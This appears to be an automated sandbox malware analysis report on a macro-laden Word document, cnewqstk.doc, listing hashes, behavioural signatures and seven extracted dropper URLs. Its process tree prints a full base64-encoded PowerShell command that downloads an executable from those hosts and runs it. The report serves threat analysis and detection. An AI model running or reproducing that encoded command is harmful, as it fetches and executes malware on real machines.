Analysis

  • max time kernel
    108s
  • max time network
    79s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    22-05-2022 05:20

General

  • Target

    cnewqstk.doc

  • Size

    183KB

  • MD5

    13fca40dc4820dc73c751e70130201f7

  • SHA1

    3edaa4017e9f54561bafb3b2e5406e666e271146

  • SHA256

    b9867ead986e6afb8337409a0b509cac26e3d383deb83f38f1cfcde8eaf3ab01

  • SHA512

    fc9ca9a0b1b6ca19f41ae506e85f17b0e05e5dd6b80641e130274e219b02a91aeac7f718db1f4804c81c17e830e1ca67a2f59384d8df5e412ad76c3592c4b23b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://aci.serabd.com/gt7pie/WMq/

exe.dropper

http://acainacumbuca.com.br/protected-disk/x/

exe.dropper

http://airmaxx.rs/available-zone/UFxfTGg/

exe.dropper

http://labersa.com/preview/atbFjM/

exe.dropper

http://agenciaetalk.com/common-zone/uF5x3RF/

exe.dropper

http://brizboy.com/site/WrrdOMS/

exe.dropper

http://clutchinc.net/image/1/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cnewqstk.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2044
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABPAHgAMgA4AHcAagA2AD0AKAAnAFoAJwArACcAaAA2AG8AJwArACcAYQB4AHMAJwApADsAJgAoACcAbgBlAHcALQAnACsAJwBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAHYAOgB0AGUATQBQAFwATwBmAEYASQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBjAHQATwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAGAAVQBSAEkAYABUAHkAUABgAFIATwBUAGAATwBjAGAATwBsACIAIAA9ACAAKAAnAHQAbABzADEAMgAsACAAJwArACcAdAAnACsAJwBsACcAKwAnAHMAMQAxACcAKwAnACwAIAB0ACcAKwAnAGwAcwAnACkAOwAkAEUAagB1AGMAYQBfAF8AIAA9ACAAKAAnAFMAZgA3ACcAKwAnAF8AJwArACcAeQBkAGsAdQAnACkAOwAkAEUAXwBjAHoAbABlAHcAPQAoACcAUwBfAGEAJwArACcAbQBlAHEAZwAnACkAOwAkAEsAMgBvAHUAOQBjAHgAPQAkAGUAbgB2ADoAdABlAG0AcAArACgAKAAnAGEAYgB5ACcAKwAnAE8AJwArACcAZgBmAGkAJwArACcAYwBlACcAKwAnADIAMAAxACcAKwAnADkAYQBiAHkAJwApACAALQBjAFIARQBQAGwAYQBDAEUAIAAnAGEAYgB5ACcALABbAEMASABhAHIAXQA5ADIAKQArACQARQBqAHUAYwBhAF8AXwArACgAJwAuACcAKwAnAGUAeABlACcAKQA7ACQARQB2ADEAaQBpADQAdAA9ACgAJwBBAG4AJwArACcANwAnACsAJwBlAF8AcgBxACcAKQA7ACQAUAAyAGgAbAAyAGMAeAA9ACYAKAAnAG4AZQB3AC0AbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AGUAYgBDAGwAaQBlAG4AdAA7ACQAUQBnAF8AZgBsAGoAbwA9ACgAJwBoAHQAdABwADoALwAvACcAKwAnAGEAYwBpAC4AcwAnACsAJwBlAHIAYQBiACcAKwAnAGQALgBjAG8AbQAvAGcAdAAnACsAJwA3AHAAaQBlAC8AJwArACcAVwBNAHEAJwArACcALwAqACcAKwAnAGgAdAB0AHAAOgAvACcAKwAnAC8AJwArACcAYQBjAGEAaQBuAGEAYwAnACsAJwB1AG0AYgB1AGMAYQAuAGMAbwBtAC4AYgByAC8AcAAnACsAJwByACcAKwAnAG8AdABlAGMAdAAnACsAJwBlACcAKwAnAGQALQBkAGkAJwArACcAcwBrAC8AeAAnACsAJwAvACoAJwArACcAaAB0AHQAcAAnACsAJwA6AC8ALwBhAGkAcgBtAGEAeAAnACsAJwB4ACcAKwAnAC4AJwArACcAcgAnACsAJwBzAC8AYQB2AGEAaQBsACcAKwAnAGEAJwArACcAYgBsAGUALQB6AG8AbgBlAC8AJwArACcAVQBGAHgAJwArACcAZgAnACsAJwBUAEcAZwAnACsAJwAvACoAJwArACcAaAB0ACcAKwAnAHQAJwArACcAcAAnACsAJwA6AC8AJwArACcALwBsACcAKwAnAGEAYgBlAHIAcwAnACsAJwBhAC4AYwBvAG0ALwAnACsAJwBwAHIAZQAnACsAJwB2AGkAJwArACcAZQAnACsAJwB3AC8AYQB0ACcAKwAnAGIARgBqAE0AJwArACcALwAqACcAKwAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AYQBnAGUAbgBjACcAKwAnAGkAYQBlAHQAYQAnACsAJwBsACcAKwAnAGsAJwArACcALgAnACsAJwBjACcAKwAnAG8AbQAvAGMAbwBtAG0AbwBuAC0AegBvAG4AZQAvAHUARgA1AHgAMwBSAEYALwAqAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AJwArACcAYgAnACsAJwByAGkAegBiAG8AeQAuAGMAJwArACcAbwBtACcAKwAnAC8AcwAnACsAJwBpAHQAJwArACcAZQAvAFcAcgByAGQATwBNAFMALwAqAGgAJwArACcAdAB0AHAAOgAvAC8AYwBsAHUAdABjACcAKwAnAGgAaQBuAGMALgBuAGUAJwArACcAdAAvAGkAbQAnACsAJwBhAGcAZQAvADEALwAnACkALgAiAFMAUABgAEwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARQBuAHAAagAzAHUAeQA9ACgAJwBHACcAKwAnAHkAbAB4AHIAZwB1ACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFAAMQA2AHQAeQBjAGIAIABpAG4AIAAkAFEAZwBfAGYAbABqAG8AKQB7AHQAcgB5AHsAJABQADIAaABsADIAYwB4AC4AIgBkAGAATwBXAGAATgBsAE8AYABBAGQAZgBJAEwARQAiACgAJABQADEANgB0AHkAYwBiACwAIAAkAEsAMgBvAHUAOQBjAHgAKQA7ACQAUwBkAHMAdAB1AG0AbQA9ACgAJwBNAGwAegAnACsAJwAwAGoAcwAyACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtACcAKwAnAEkAdABlAG0AJwApACAAJABLADIAbwB1ADkAYwB4ACkALgAiAGwARQBOAGcAYABUAEgAIgAgAC0AZwBlACAAMgA0ADYANwA1ACkAIAB7AC4AKAAnAEkAbgB2ACcAKwAnAG8AawBlACcAKwAnAC0ASQB0AGUAJwArACcAbQAnACkAKAAkAEsAMgBvAHUAOQBjAHgAKQA7ACQAUgBmADMAYgA5AGYAdwA9ACgAJwBRAF8AdQAnACsAJwBzADgAagAnACsAJwA1ACcAKQA7AGIAcgBlAGEAawA7ACQARQBwADgAMAA5ADQANgA9ACgAJwBCADQAcQAnACsAJwA2ADEANAAyACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQgBlADUAYQA0AHkAMwA9ACgAJwBYACcAKwAnAHcAOABtADMAJwArACcANgB1ACcAKQA=
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1016

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1016-79-0x000007FEFBFD1000-0x000007FEFBFD3000-memory.dmp
      Filesize

      8KB

    • memory/1016-83-0x000000000256B000-0x000000000258A000-memory.dmp
      Filesize

      124KB

    • memory/1016-82-0x000000001B730000-0x000000001BA2F000-memory.dmp
      Filesize

      3.0MB

    • memory/1016-80-0x000007FEF3960000-0x000007FEF44BD000-memory.dmp
      Filesize

      11.4MB

    • memory/1016-81-0x0000000002564000-0x0000000002567000-memory.dmp
      Filesize

      12KB

    • memory/1368-84-0x0000000000000000-mapping.dmp
    • memory/2044-68-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-73-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-62-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-63-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-64-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-65-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-66-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-67-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-70-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-69-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-54-0x0000000072921000-0x0000000072924000-memory.dmp
      Filesize

      12KB

    • memory/2044-71-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-72-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-61-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-74-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-76-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-77-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-78-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-75-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-60-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-59-0x00000000006E1000-0x00000000006E5000-memory.dmp
      Filesize

      16KB

    • memory/2044-58-0x000000007138D000-0x0000000071398000-memory.dmp
      Filesize

      44KB

    • memory/2044-57-0x0000000075841000-0x0000000075843000-memory.dmp
      Filesize

      8KB

    • memory/2044-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2044-55-0x00000000703A1000-0x00000000703A3000-memory.dmp
      Filesize

      8KB

    • memory/2044-86-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB